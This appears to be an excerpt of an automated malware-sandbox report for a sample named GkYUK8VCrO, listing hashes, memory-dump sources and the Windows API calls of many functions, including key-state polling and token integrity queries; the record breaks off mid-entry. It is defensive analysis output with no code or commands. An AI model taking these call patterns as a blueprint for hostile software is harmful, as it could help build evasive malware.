                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                • String ID:
                                • API String ID: 1389676194-0
                                • Opcode ID: 499a269e9eb5cc51cc855812facdaf0d584484c1a6906f8b15a9d3cf80c5fb59
                                • Instruction ID: a50780e9d278ceec3f097760e10d47f9a2d1b569763a5bb438d835c1a1008605
                                • Opcode Fuzzy Hash: 499a269e9eb5cc51cc855812facdaf0d584484c1a6906f8b15a9d3cf80c5fb59
                                • Instruction Fuzzy Hash: 95510C35A00205EFCF15EF64C981AAEBBF5EF49310B1484A9F849AB3A1DB31ED51DB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 29e571b09ed29d72136230909e1c9449ab9df4f937fd50327a40fbda44b84fb4
                                • Instruction ID: e50d9533df2734d6b30776afb2e638950f73d931a429058324d7ac1761a1054b
                                • Opcode Fuzzy Hash: 29e571b09ed29d72136230909e1c9449ab9df4f937fd50327a40fbda44b84fb4
                                • Instruction Fuzzy Hash: 9D41D435900124AFD720DF28EC88FB9BBF9EB09310F1441A5F869A72E1DB74AD41DA95
                                APIs
                                • GetCursorPos.USER32(?), ref: 00AA2357
                                • ScreenToClient.USER32(00B667B0,?), ref: 00AA2374
                                • GetAsyncKeyState.USER32(00000001), ref: 00AA2399
                                • GetAsyncKeyState.USER32(00000002), ref: 00AA23A7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AsyncState$ClientCursorScreen
                                • String ID:
                                • API String ID: 4210589936-0
                                • Opcode ID: f19d508924853f6dcbdd3e53e89d61d0b37c3241cb307055c44963bb4bf4f420
                                • Instruction ID: 1e51b56bfb23e65af2021d5aa4f8f6306f97b2f5b053721d5abdaa062adffe09
                                • Opcode Fuzzy Hash: f19d508924853f6dcbdd3e53e89d61d0b37c3241cb307055c44963bb4bf4f420
                                • Instruction Fuzzy Hash: 7B416D3550411AFBDF159FA8C844AEABBB4FF06320F20436AF829972D0C7349964DBA1
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF695D
                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00AF69A9
                                • TranslateMessage.USER32(?), ref: 00AF69D2
                                • DispatchMessageW.USER32(?), ref: 00AF69DC
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF69EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                • String ID:
                                • API String ID: 2108273632-0
                                • Opcode ID: 772ab1d393af7233ce66e795341f76a9e0e72727b54000f92cb287034da3f845
                                • Instruction ID: 9dd5e5082935d6bdad705a0a3fefed4dfdedf738457ac3dc9d870b1c39a5df31
                                • Opcode Fuzzy Hash: 772ab1d393af7233ce66e795341f76a9e0e72727b54000f92cb287034da3f845
                                • Instruction Fuzzy Hash: F231C57150024AAADB31DFB48C84FB6BBBCEB11344F104569F621D31A1DBB5D88AD7A0
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00AF8F12
                                • PostMessageW.USER32(?,00000201,00000001), ref: 00AF8FBC
                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AF8FC4
                                • PostMessageW.USER32(?,00000202,00000000), ref: 00AF8FD2
                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AF8FDA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessagePostSleep$RectWindow
                                • String ID:
                                • API String ID: 3382505437-0
                                • Opcode ID: 2f2ac0ea102b2e6a9672da72d018e02cf990b2285c0e48c29be03e915a57c5a4
                                • Instruction ID: 0dbfe50c75809e6058f70bcb79edc38928c428e6b27b712b1adf9711c9c3367b
                                • Opcode Fuzzy Hash: 2f2ac0ea102b2e6a9672da72d018e02cf990b2285c0e48c29be03e915a57c5a4
                                • Instruction Fuzzy Hash: 9C31BC7150021EEFDF14CFA8DD4DAAE7BB6EB04315F104229FA25AB1D0CBB49914DB90
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00AFB6C7
                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AFB6E4
                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AFB71C
                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AFB742
                                • _wcsstr.LIBCMT ref: 00AFB74C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                • String ID:
                                • API String ID: 3902887630-0
                                • Opcode ID: f5fed08cee74785c21d6165db84a0a331db1c6a1996edf66eb7e8913c55ceb09
                                • Instruction ID: 27166256f69ccf9dc4512199609f8c18c4b97bd90e986119f79ee30d0768653b
                                • Opcode Fuzzy Hash: f5fed08cee74785c21d6165db84a0a331db1c6a1996edf66eb7e8913c55ceb09
                                • Instruction Fuzzy Hash: 65210732605208BBEB256B79DD49E7B7BB8DF49750F10403DFD05CA1A1EF61DC4192A0
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • GetWindowLongW.USER32(?,000000F0), ref: 00B2B44C
                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B2B471
                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B2B489
                                • GetSystemMetrics.USER32(00000004), ref: 00B2B4B2
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B11184,00000000), ref: 00B2B4D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$Long$MetricsSystem
                                • String ID:
                                • API String ID: 2294984445-0
                                • Opcode ID: 46f00a8a8257ba9b5e4b07fa2316be13c7d0b790084aa2b518e5a848c6485708
                                • Instruction ID: f2b0371eda7ea1646fb59d3479bffc7a111166f8fb6d0669062bd363ab38572a
                                • Opcode Fuzzy Hash: 46f00a8a8257ba9b5e4b07fa2316be13c7d0b790084aa2b518e5a848c6485708
                                • Instruction Fuzzy Hash: 15216271510666AFCB20AF38AC84E6A77E4EB05720F144775F939D72E1EF309811DB90
                                APIs
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF9802
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF9834
                                • __itow.LIBCMT ref: 00AF984C
                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF9874
                                • __itow.LIBCMT ref: 00AF9885
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$__itow$_memmove
                                • String ID:
                                • API String ID: 2983881199-0
                                • Opcode ID: 34fa3e077e335535fa4c1e35e803d0eefd5a15248488cb58485cea9b4edc0c4f
                                • Instruction ID: 89dff2f9fee4ba208ce1fe90e44d012d2e611f4ae670ff4b728adc58b6d9aada
                                • Opcode Fuzzy Hash: 34fa3e077e335535fa4c1e35e803d0eefd5a15248488cb58485cea9b4edc0c4f
                                • Instruction Fuzzy Hash: 4B21B331A00208ABDB219BA58D8AFFF7BB8EF4A750F044039FA049B291DA708D4587D1
                                APIs
                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA134D
                                • SelectObject.GDI32(?,00000000), ref: 00AA135C
                                • BeginPath.GDI32(?), ref: 00AA1373
                                • SelectObject.GDI32(?,00000000), ref: 00AA139C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ObjectSelect$BeginCreatePath
                                • String ID:
                                • API String ID: 3225163088-0
                                • Opcode ID: c69cb45a9918abcccc9b72cc90e602c3cd51f85d9bb3b79d36cecb1e790f0ef1
                                • Instruction ID: 4180d8fdced296c1cb8c02af4af9fe2da80277a3c671a5ff30f3563598b5c9b9
                                • Opcode Fuzzy Hash: c69cb45a9918abcccc9b72cc90e602c3cd51f85d9bb3b79d36cecb1e790f0ef1
                                • Instruction Fuzzy Hash: 68213D70800209EFDF119F25DC047AD7BB9FB11321F148227F8119B5E0DBB59992DBA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID:
                                • API String ID: 2931989736-0
                                • Opcode ID: d80cc450f128e5e1db65423577497cebdbf47a767db2d34ad0cb27ad09a61b0c
                                • Instruction ID: f0e0eb7811ee0765115867276190d8d06f2017e2ecd00951fa9f20930480298f
                                • Opcode Fuzzy Hash: d80cc450f128e5e1db65423577497cebdbf47a767db2d34ad0cb27ad09a61b0c
                                • Instruction Fuzzy Hash: 6801B97170410D7BD204A7665E52F7BB39C9B113B4F544125FE0497293E660EF3182E4
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 00B04D5C
                                • __beginthreadex.LIBCMT ref: 00B04D7A
                                • MessageBoxW.USER32(?,?,?,?), ref: 00B04D8F
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B04DA5
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B04DAC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                • String ID:
                                • API String ID: 3824534824-0
                                • Opcode ID: 25836a83204751e0e41ef8ab706198d447a0fcc0a0b8f1f60b1318fb150db734
                                • Instruction ID: 9aeeef9c70b230c729ce37f37c9ce2bd40c23abcee1306ed18d2ad00c94c2055
                                • Opcode Fuzzy Hash: 25836a83204751e0e41ef8ab706198d447a0fcc0a0b8f1f60b1318fb150db734
                                • Instruction Fuzzy Hash: 381108B2904205BBC7119BA8DC04AAB7FECEB45324F1443B9F914D32D1DBB58D008BA0
                                APIs
                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8766
                                • GetLastError.KERNEL32(?,00AF822A,?,?,?), ref: 00AF8770
                                • GetProcessHeap.KERNEL32(00000008,?,?,00AF822A,?,?,?), ref: 00AF877F
                                • HeapAlloc.KERNEL32(00000000,?,00AF822A,?,?,?), ref: 00AF8786
                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF879D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 842720411-0
                                • Opcode ID: 1fa8c1168035fbfff58a136fce884b91b7b4ca24e0cab08b130153d13bafc758
                                • Instruction ID: 2e45fb2ec01215e10b717801b1952a34b64c249dd417944aaadd2b26154d7f35
                                • Opcode Fuzzy Hash: 1fa8c1168035fbfff58a136fce884b91b7b4ca24e0cab08b130153d13bafc758
                                • Instruction Fuzzy Hash: 46014B71600209EFDB205FA6DC89D7B7BBCEF897957200439F949D3260DE358C12CA60
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05502
                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B05510
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05518
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B05522
                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B0555E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                • String ID:
                                • API String ID: 2833360925-0
                                • Opcode ID: 680b2d6262dd4e40af06d4e00127901b8ab4720f147a6d18dd64246077766588
                                • Instruction ID: ee5023ae9c268ab84f22a4abc41a49b2bae3556e4f96f090f82e2d25be147596
                                • Opcode Fuzzy Hash: 680b2d6262dd4e40af06d4e00127901b8ab4720f147a6d18dd64246077766588
                                • Instruction Fuzzy Hash: DF013C35C00A19DBCF209BE4EC896EEBBB8FB19701F4000A6E501B3580DB3056618BA1
                                APIs
                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?,?,00AF799D), ref: 00AF766F
                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF768A
                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF7698
                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?), ref: 00AF76A8
                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF758C,80070057,?,?), ref: 00AF76B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                • String ID:
                                • API String ID: 3897988419-0
                                • Opcode ID: 65734095ca9d07954669cacbdc52cc124f939cfd49643a9a7a28b70e0401dd68
                                • Instruction ID: 48c194360d7a567ac110af241216a54b949b4e8b0f99fe491b72f0a7d9c05560
                                • Opcode Fuzzy Hash: 65734095ca9d07954669cacbdc52cc124f939cfd49643a9a7a28b70e0401dd68
                                • Instruction Fuzzy Hash: 72017172601609ABDB219F9CDC44ABEBBBDEB45751F140038FE04D7211EB31DD4197A0
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF8608
                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF8612
                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF8621
                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF8628
                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF863E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: f9a3932ee3b742868a0c5f48290fcee713b6f50792b86aef89c9daf342aa116c
                                • Instruction ID: 9211b59b20b67076deb1dc951c7291dcadcaef0a1bcc2a46344bfe821087abcf
                                • Opcode Fuzzy Hash: f9a3932ee3b742868a0c5f48290fcee713b6f50792b86aef89c9daf342aa116c
                                • Instruction Fuzzy Hash: 3EF03731201209AFEB200FE5DC89E7B3BACEF8AB55B400439FA49D7150DF659C42DA60
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8669
                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8673
                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8682
                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8689
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF869F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
